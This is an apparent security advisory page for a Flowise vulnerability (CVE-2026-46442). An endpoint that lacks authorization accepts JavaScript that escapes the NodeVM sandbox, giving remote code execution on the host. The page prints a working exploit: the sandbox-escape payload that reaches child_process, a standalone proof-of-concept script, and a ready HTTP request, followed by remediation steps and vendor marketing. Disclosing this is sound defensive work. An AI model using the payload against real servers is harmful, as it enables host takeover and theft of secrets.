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GHSA-9rvc-vf7m-pgm2

GHSA-9rvc-vf7m-pgm2 is a Code Injection vulnerability in flowise. O3 Security confirms whether GHSA-9rvc-vf7m-pgm2 is actually reachable in your code before you act, and blocks exploitation at runtime until you patch.

FlowiseAI: Authenticated Host RCE via POST /api/v1/node-custom-function and NodeVM Sandbox Escape

Also known asCVE-2026-46442
Published
May 14, 2026
Updated
Jun 9, 2026
Affected
1 pkg
Patched
1 / 1
Exploits
None indexed

Blast Radius

1 pkg affected

Weekly download volume for affected packages — a proxy for how broadly this vulnerability is deployed.

flowisenpm
4Kdownloads / week

Description

Summary

POST /api/v1/node-custom-function lacks route-level authorization, allowing any authenticated user or API key to submit arbitrary JavaScript to the Custom JS Function node.

When E2B_APIKEY is not configured — the common deployment case — Flowise executes this code inside a NodeVM sandbox. This sandbox can be escaped, allowing an attacker to reach the host process object and execute system commands via child_process.

The result is authenticated remote code execution on the Flowise server host. CVSS v3.1: AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H = 9.9 Critical.

Details

Two distinct security boundaries are violated.

1. Missing route-level authorization

packages/server/src/routes/node-custom-functions/index.ts registers the endpoint with no permission middleware:

router.post('/', nodesRouter.executeCustomFunction)

Other sensitive routes in the same codebase use explicit permission gates:

// packages/server/src/routes/chatflows/index.ts
router.post(
  '/',
  checkAnyPermission('chatflows:create,chatflows:update,agentflows:create,agentflows:update'),
  chatflowsController.saveChatflow
)

Global /api/v1 authentication still applies, so this is not unauthenticated — but any valid session or API key reaches the endpoint without further restriction.

2. NodeVM sandbox escape

The endpoint forwards body.javascriptFunction through the following chain:

POST /api/v1/node-custom-function
  → packages/server/src/controllers/nodes/index.ts
  → packages/server/src/utils/executeCustomNodeFunction.ts
  → packages/components/nodes/utilities/CustomFunction/CustomFunction.ts
    executeJavaScriptCode(javascriptFunction, sandbox)
  → packages/components/src/utils.ts
    if !process.env.E2B_APIKEY → NodeVM fallback
  → [SINK] host process / child_process

packages/components/src/utils.ts only uses the external E2B sandbox when E2B_APIKEY is set. Otherwise it silently falls back to @flowiseai/nodevm:

const shouldUseSandbox = useSandbox && process.env.E2B_APIKEY

Flowise explicitly frames this as a sandboxed execution path — the helper is named createCodeExecutionSandbox, its inline comment reads Execute JavaScript code using either Sandbox or NodeVM, and the NodeVM instance is configured with eval: false, wasm: false, and mocked HTTP clients. The sandbox is a real declared security boundary, not incidental isolation.

These controls do not prevent escape. The payload abuses an exception path where an Error object escapes the NodeVM boundary. Because the error originates from the host runtime, its constructor chain resolves to the outer Node.js realm. This allows recovery of the host Function constructor (e.constructor.constructor), which can then access process and built-in modules such as child_process:

const FunctionCtor = e.constructor.constructor;
const cp = FunctionCtor('return process.getBuiltinModule("child_process")')();
return cp.execSync('id').toString().trim();

The NodeVM fallback is the practical default. packages/server/.env.example and CONTRIBUTING.md do not require E2B_APIKEY for custom JS execution, so most deployments are affected.

PoC

Standalone verification (run from the repository root with E2B_APIKEY unset):

// poc_Flowise_NodeCustomFunction_RCE_2026.js
const path = require('path');

delete process.env.E2B_APIKEY;
process.env.TS_NODE_COMPILER_OPTIONS = JSON.stringify({ moduleResolution: 'NodeNext' });

require(path.resolve('targets/Flowise/node_modules/ts-node/register/transpile-only'));

const { nodeClass: CustomFunction } = require(path.resolve(
  'targets/Flowise/packages/components/nodes/utilities/CustomFunction/CustomFunction.ts'
));

const attackCode = `
async function f() {
  const error = new Error();
  error.name = Object.create(null);
  return error.stack;
}
return await f().catch(e => {
  const FunctionCtor = e.constructor.constructor;
  const cp = FunctionCtor('return process.getBuiltinModule("child_process")')();
  return cp.execSync('id').toString().trim();
});
`;

(async () => {
  const node = new CustomFunction();
  const result = await node.init(
    { inputs: { javascriptFunction: attackCode } },
    '',
    { appDataSource: {}, databaseEntities: {}, workspaceId: undefined, orgId: undefined }
  );
  console.log('[RCE OUTPUT]', result);
})();

Confirmed output:

[RCE OUTPUT] uid=501(researcher) gid=20(staff) groups=20(staff),...

HTTP trigger (requires a valid API key or session):

POST /api/v1/node-custom-function HTTP/1.1
Host: target:3000
Authorization: Bearer <valid-api-key>
Content-Type: application/json

{
  "javascriptFunction": "async function f(){const error=new Error();error.name=Object.create(null);return error.stack;} return await f().catch(e=>{const F=e.constructor.constructor;const cp=F('return process.getBuiltinModule(\"child_process\")')();return cp.execSync('id').toString().trim();});"
}

Impact

Any authenticated Flowise user or holder of a standard API key can execute arbitrary commands as the Flowise server process. This includes reading environment variables and secrets, arbitrary filesystem access, outbound network requests from the host, and a foothold for persistence or lateral movement.

The NodeVM fallback is the default for any deployment without E2B_APIKEY configured, which covers the majority of self-hosted instances.

Recommended remediation:

  1. Add explicit permission gating to POST /api/v1/node-custom-function using the existing checkPermission middleware pattern.
  2. Fail closed if E2B_APIKEY is absent — do not silently downgrade to NodeVM for untrusted code execution.
  3. Restrict this endpoint from generic API key access.

Affected Packages

1 total 1 fixed
EcosystemPackageVulnerable rangeFix
📦npmflowiseall versions3.1.2

Detection & mitigation playbook

Open-source dependency
  1. Detect

    Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for flowise. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

  2. Fix

    Update flowise to 3.1.2 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-9rvc-vf7m-pgm2 is resolved across your whole dependency graph.

  3. Workarounds

    If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

  4. How O3 protects you

    O3 pinpoints whether GHSA-9rvc-vf7m-pgm2 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-9rvc-vf7m-pgm2. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

### Summary `POST /api/v1/node-custom-function` lacks route-level authorization, allowing any authenticated user or API key to submit arbitrary JavaScript to the `Custom JS Function` node. When `E2B_APIKEY` is not configured — the common deployment case — Flowise executes this code inside a `NodeVM` sandbox. This sandbox can be escaped, allowing an attacker to reach the host `process` object and execute system commands via `child_process`. The result is authenticated remote code execution on the Flowise server host. CVSS v3.1: `AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H` = **9.9 Critical**. ### D
O3 Security · Impact-Aware SCA

Is GHSA-9rvc-vf7m-pgm2 in your dependencies?

O3 detects GHSA-9rvc-vf7m-pgm2 across npm dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.